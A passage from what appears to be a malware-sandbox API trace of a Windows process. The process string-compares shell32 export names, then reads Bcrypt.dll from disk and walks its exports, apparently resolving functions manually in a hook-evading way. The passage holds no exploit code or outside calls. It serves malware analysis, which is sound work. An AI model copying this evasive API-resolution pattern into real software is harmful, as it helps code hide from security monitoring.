lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CheckEscapesW") returned 1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLL") returned 1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLA") returned 1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLW") returned 1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 0 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0249.525] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 0 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 0 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AppCompat_RunDLLW") returned 1 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocCreateForClasses") returned 1 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocGetDetailsOfPropKey") returned 1 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CDefFolderMenu_Create2") returned 1 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CIDLData_CreateFromIDArray") returned 1 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CheckEscapesW") returned 1 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CommandLineToArgvW") returned 1 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLL") returned 1 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLA") returned 1 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLAsUserW") returned 1 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLW") returned 1 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 0 [0249.526] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AppCompat_RunDLLW") returned 1 [0249.527] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocCreateForClasses") returned 1 [0249.527] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0249.527] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0249.527] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0249.527] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0249.527] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CheckEscapesW") returned 1 [0249.527] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CommandLineToArgvW") returned 1 [0249.527] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLL") returned 1 [0249.527] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLA") returned 1 [0249.527] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0249.527] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="Control_RunDLLW") returned 1 [0249.527] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0249.527] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0249.527] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0249.527] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0249.527] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0249.527] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0249.527] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 0 [0249.527] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AppCompat_RunDLLW") returned 1 [0249.527] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocCreateForClasses") returned 1 [0249.527] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="AssocGetDetailsOfPropKey") returned 1 [0249.527] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CDefFolderMenu_Create2") returned 1 [0249.527] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CIDLData_CreateFromIDArray") returned 1 [0249.527] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0249.527] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CheckEscapesW") returned 1 [0249.527] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CommandLineToArgvW") returned 1 [0249.527] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLL") returned 1 [0249.527] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLA") returned 1 [0249.527] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLAsUserW") returned 1 [0249.527] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="Control_RunDLLW") returned 1 [0249.527] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0249.527] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0249.527] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0249.527] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0249.527] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0249.527] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0249.527] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0249.527] lstrcmpA (lpString1="DAD_AutoScroll", lpString2="DAD_AutoScroll") returned 0 [0249.527] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AppCompat_RunDLLW") returned 1 [0249.527] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocCreateForClasses") returned 1 [0249.527] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="AssocGetDetailsOfPropKey") returned 1 [0249.527] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CDefFolderMenu_Create2") returned 1 [0249.527] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CIDLData_CreateFromIDArray") returned 1 [0249.527] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0249.528] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CheckEscapesW") returned 1 [0249.528] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CommandLineToArgvW") returned 1 [0249.528] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLL") returned 1 [0249.528] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLA") returned 1 [0249.528] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLAsUserW") returned 1 [0249.528] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="Control_RunDLLW") returned 1 [0249.528] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0249.528] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0249.528] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0249.528] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0249.528] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0249.528] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0249.528] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage") returned 1 [0249.528] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_AutoScroll") returned 1 [0249.528] lstrcmpA (lpString1="DAD_DragEnterEx", lpString2="DAD_DragEnterEx") returned 0 [0249.528] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AppCompat_RunDLLW") returned 1 [0249.528] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocCreateForClasses") returned 1 [0249.528] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0249.528] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CDefFolderMenu_Create2") returned 1 [0249.528] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CIDLData_CreateFromIDArray") returned 1 [0249.528] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 1 [0249.528] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CheckEscapesW") returned 1 [0249.528] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CommandLineToArgvW") returned 1 [0249.528] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLL") returned 1 [0249.528] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLA") returned 1 [0249.528] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLAsUserW") returned 1 [0249.528] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="Control_RunDLLW") returned 1 [0249.528] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0249.528] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0249.528] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0249.528] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0249.528] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0249.528] lstrcmpA (lpString1="DAD_DragEnterEx2", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 1 [0249.587] GetProcessHeap () returned 0x4e0000 [0249.587] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x40ec040 | out: hHeap=0x4e0000) returned 1 [0249.658] GetProcessHeap () returned 0x4e0000 [0249.658] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x10) returned 0x4f93a0 [0249.658] LoadLibraryA (lpLibFileName="Bcrypt.dll") returned 0x7ffc5bcc0000 [0251.712] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0251.712] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0251.712] GetModuleFileNameA (in: hModule=0x7ffc5bcc0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0251.713] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0251.714] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0251.714] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0251.714] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=159648) returned 1 [0251.714] GetProcessHeap () returned 0x4e0000 [0251.714] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x26fa0) returned 0x2d22010 [0251.716] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0251.716] ReadFile (in: hFile=0x15c, lpBuffer=0x2d22010, nNumberOfBytesToRead=0x26fa0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d22010*, lpNumberOfBytesRead=0x14f5a4*=0x26fa0, lpOverlapped=0x0) returned 1 [0251.720] CloseHandle (hObject=0x15c) returned 1 [0251.720] lstrcmpA (lpString1="BCryptAddContextFunction", lpString2="BCryptAddContextFunction") returned 0 [0251.720] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunction") returned 1 [0251.720] lstrcmpA (lpString1="BCryptAddContextFunctionProvider", lpString2="BCryptAddContextFunctionProvider") returned 0 [0251.720] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunction") returned 1 [0251.720] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptAddContextFunctionProvider") returned 1 [0251.720] lstrcmpA (lpString1="BCryptCloseAlgorithmProvider", lpString2="BCryptCloseAlgorithmProvider") returned 0 [0251.720] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunction") returned 1 [0251.720] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0251.720] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0251.721] lstrcmpA (lpString1="BCryptConfigureContext", lpString2="BCryptConfigureContext") returned 0 [0251.721] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunction") returned 1 [0251.721] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptAddContextFunctionProvider") returned 1 [0251.721] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0251.721] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContext") returned 1 [0251.721] lstrcmpA (lpString1="BCryptConfigureContextFunction", lpString2="BCryptConfigureContextFunction") returned 0 [0251.721] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunction") returned 1 [0251.721] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0251.721] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0251.721] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContext") returned 1 [0251.721] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptConfigureContextFunction") returned 1 [0251.721] lstrcmpA (lpString1="BCryptCreateContext", lpString2="BCryptCreateContext") returned 0 [0251.721] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunction") returned 1 [0251.721] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0251.721] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0251.721] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContext") returned 1 [0251.721] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptConfigureContextFunction") returned 1 [0251.721] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateContext") returned 1 [0251.721] lstrcmpA (lpString1="BCryptCreateHash", lpString2="BCryptCreateHash") returned 0 [0251.721] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunction") returned 1 [0251.721] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptAddContextFunctionProvider") returned 1 [0251.721] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0251.722] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContext") returned 1 [0251.722] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptConfigureContextFunction") returned 1 [0251.722] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateContext") returned 1 [0251.722] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateHash") returned 1 [0251.722] lstrcmpA (lpString1="BCryptCreateMultiHash", lpString2="BCryptCreateMultiHash") returned 0 [0251.722] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunction") returned 1 [0251.722] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptAddContextFunctionProvider") returned 1 [0251.722] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0251.722] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContext") returned 1 [0251.722] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptConfigureContextFunction") returned 1 [0251.722] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateContext") returned 1 [0251.722] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateHash") returned 1 [0251.722] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptCreateMultiHash") returned 1 [0251.722] lstrcmpA (lpString1="BCryptDecrypt", lpString2="BCryptDecrypt") returned 0 [0251.722] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunction") returned 1 [0251.722] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptAddContextFunctionProvider") returned 1 [0251.722] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0251.722] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContext") returned 1 [0251.722] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptConfigureContextFunction") returned 1 [0251.722] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateContext") returned 1 [0251.722] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateHash") returned 1 [0251.722] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptCreateMultiHash") returned 1 [0251.722] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDecrypt") returned 1 [0251.722] lstrcmpA (lpString1="BCryptDeleteContext", lpString2="BCryptDeleteContext") returned 0 [0251.723] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunction") returned 1 [0251.723] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptAddContextFunctionProvider") returned 1 [0251.723] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0251.723] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContext") returned 1 [0251.723] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptConfigureContextFunction") returned 1 [0251.723] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateContext") returned 1 [0251.723] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateHash") returned 1 [0251.723] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptCreateMultiHash") returned 1 [0251.723] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDecrypt") returned 1 [0251.723] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeleteContext") returned 1 [0251.723] lstrcmpA (lpString1="BCryptDeriveKey", lpString2="BCryptDeriveKey") returned 0 [0251.723] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunction") returned 1 [0251.723] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptAddContextFunctionProvider") returned 1 [0251.723] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptCloseAlgorithmProvider") returned 1 [0251.723] lstrcmpA (lpString1="BCryptDeriveKeyCapi", lpString2="BCryptConfigureContext") returned 1 [0251.723] lstrcmpA (lpString1="BCryptDeriveKeyCapi", 